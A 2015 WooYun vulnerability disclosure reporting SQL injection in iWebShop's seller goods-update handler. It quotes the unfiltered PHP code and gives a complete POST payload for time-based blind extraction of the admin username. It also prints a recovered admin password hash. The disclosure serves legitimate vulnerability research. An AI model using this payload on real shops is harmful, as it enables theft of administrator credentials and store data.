当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094282

漏洞标题:Iwebshop最新版多个SQL注入漏洞打包

相关厂商:jooyea.net

漏洞作者: 路人甲

提交时间:2015-04-09 12:38

修复时间:2015-07-13 12:40

公开时间:2015-07-13 12:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-06-08: 细节向核心白帽子及相关领域专家公开
2015-06-18: 细节向普通白帽子公开
2015-06-28: 细节向实习白帽子公开
2015-07-13: 细节向公众公开

简要描述:

Iwebshop最新版多个SQL注入漏洞打包

详细说明:

看到wooyun上有人提了几个iweshop(2014-11-18更新)的漏洞( WooYun: iWebShop开源电子商务系统SQL注入漏洞 ),去官网看了看,在2014-12-16 已更新到了 iwebshop2.9.14121000,下下来研究研究,希望不要重复。
注入一枚:POST /index.php?controller=seller&action=goods_update POST参数中的多个参数存在注入,如_goods_no,_market_price,_sell_price,_cost_price,_weight,我些参数都存在注入,证明如下图

多处注入副本.jpg


问题文件在/controllers/seller.php的goods_update()方法中
下面以weight为例进行说明
看看代码/controllers/seller.php

//商品更新动作
	public function goods_update()
	{
		$id       = IFilter::act(IReq::get('id'),'int');
		$callback = IFilter::act(IReq::get('callback'),'url');
		$callback = strpos($callback,'seller/goods_list') === false ? '' : $callback;
		//检查表单提交状态
		if(!$_POST)
		{
			die('请确认表单提交正确');
		}
		//初始化商品数据
		unset($_POST['id']);
		unset($_POST['callback']);
		$goodsObject = new goods_class($this->seller['seller_id']);
		$goodsObject->update($id,$_POST);
		$callback ? $this->redirect($callback) : $this->redirect("goods_list");
	}


再去看看update

public function update($id,$paramData)
	{
		$postData = array();
		$nowDataTime = ITime::getDateTime();
		foreach($paramData as $key => $val)
		{
			$postData[$key] = $val;
			//数据过滤分组
			if(strpos($key,'attr_id_') !== false)
			{
				$goodsAttrData[ltrim($key,'attr_id_')] = IFilter::act($val);
			}
			else if($key[0] != '_')
			{
				$goodsUpdateData[$key] = IFilter::act($val,'text');
			}
		}
		//商家发布商品默认设置
		if($this->seller_id)
		{
			$goodsUpdateData['seller_id'] = $this->seller_id;
			$goodsUpdateData['is_del'] = $goodsUpdateData['is_del'] == 2 ? 2 : 3;
		}
		//上架或者下架处理
		if(isset($goodsUpdateData['is_del']))
		{
			//上架
			if($goodsUpdateData['is_del'] == 0)
			{
				$goodsUpdateData['up_time']   = $nowDataTime;
				$goodsUpdateData['down_time'] = null;
			}
			//下架
			else if($goodsUpdateData['is_del'] == 2)
			{
				$goodsUpdateData['up_time']  = null;
				$goodsUpdateData['down_time']= $nowDataTime;
			}
			//审核或者删除
			else
			{
				$goodsUpdateData['up_time']   = null;
				$goodsUpdateData['down_time'] = null;
			}
		}
		//是否存在货品
		$goodsUpdateData['spec_array'] = '';
		if(isset($postData['_spec_array']))
		{
			//生成goods中的spec_array字段数据
			$goods_spec_array = array();
			foreach($postData['_spec_array'] as $key => $val)
			{
				foreach($val as $v)
				{
					$tempSpec = JSON::decode($v);
					if(!isset($goods_spec_array[$tempSpec['id']]))
					{
						$goods_spec_array[$tempSpec['id']] = array('id' => $tempSpec['id'],'name' => $tempSpec['name'],'type' => $tempSpec['type'],'value' => array());
					}
					$goods_spec_array[$tempSpec['id']]['value'][] = $tempSpec['value'];
				}
			}
			foreach($goods_spec_array as $key => $val)
			{
				$val['value'] = array_unique($val['value']);
				$goods_spec_array[$key]['value'] = join(',',$val['value']);
			}
			$goodsUpdateData['spec_array'] = JSON::encode($goods_spec_array);
		}
		$goodsUpdateData['goods_no']     = preg_replace("/(?:\-\d*)$/","",current($postData['_goods_no']));
		$goodsUpdateData['store_nums']   = array_sum($postData['_store_nums']);
		$goodsUpdateData['market_price'] = isset($postData['_market_price']) ? current($postData['_market_price']) : 0;
		$goodsUpdateData['sell_price']   = isset($postData['_sell_price'])   ? current($postData['_sell_price'])   : 0;
		$goodsUpdateData['cost_price']   = isset($postData['_cost_price'])   ? current($postData['_cost_price'])   : 0;
		$goodsUpdateData['weight']       = isset($postData['_weight'])       ? current($postData['_weight'])       : 0;
		//处理商品
		$goodsDB = new IModel('goods');
		if($id)
		{
			$goodsDB->setData($goodsUpdateData);
			$where = " id = {$id} ";
			if($this->seller_id)
			{
				$where .= " and seller_id = ".$this->seller_id;
			}
			if(!$goodsDB->update($where))
			{
				return false;
			}
		}
		else
		{
			$goodsUpdateData['create_time'] = $nowDataTime;
			$goodsDB->setData($goodsUpdateData);
			$id = $goodsDB->add();
		}
无关代码


看到这几句话

$goodsUpdateData['goods_no']     = preg_replace("/(?:\-\d*)$/","",current($postData['_goods_no']));
		$goodsUpdateData['store_nums']   = array_sum($postData['_store_nums']);
		$goodsUpdateData['market_price'] = isset($postData['_market_price']) ? current($postData['_market_price']) : 0;
		$goodsUpdateData['sell_price']   = isset($postData['_sell_price'])   ? current($postData['_sell_price'])   : 0;
		$goodsUpdateData['cost_price']   = isset($postData['_cost_price'])   ? current($postData['_cost_price'])   : 0;
		$goodsUpdateData['weight']       = isset($postData['_weight'])       ? current($postData['_weight'])       : 0;


postData中的值是没有经过过滤的,存在注入
测试方法:申请开店后,登录,添加商品时存在注入
Payload:POST提交

id=&img=&_imgList=&callback=%2Fseller%2Fregiment_edit%2Fid%2F1&name=&search_words=&sort=99&unit=%E5%8D%83%E5%85%8B&_goods_no%5B0%5D=SD142193979843&_store_nums%5B0%5D=100&_market_price%5B0%5D=&_sell_price%5B0%5D=&_cost_price%5B0%5D=&_weight%5B0%5D='or(select if(ord(mid((select admin_name from iwebshop_admin limit 0,1),1,1))=97,sleep(1),0)) or '&model_id=0&brand_id=0&is_del=3&content=&keywords=%E6%B5%8B%E8%AF%95%E5%95%86%E5%93%811&description=aaaa


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟2s左右,如下图

猜测失败副本.jpg


若正确,延迟3s左右,如下图

猜测成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:admin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-13 12:40

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无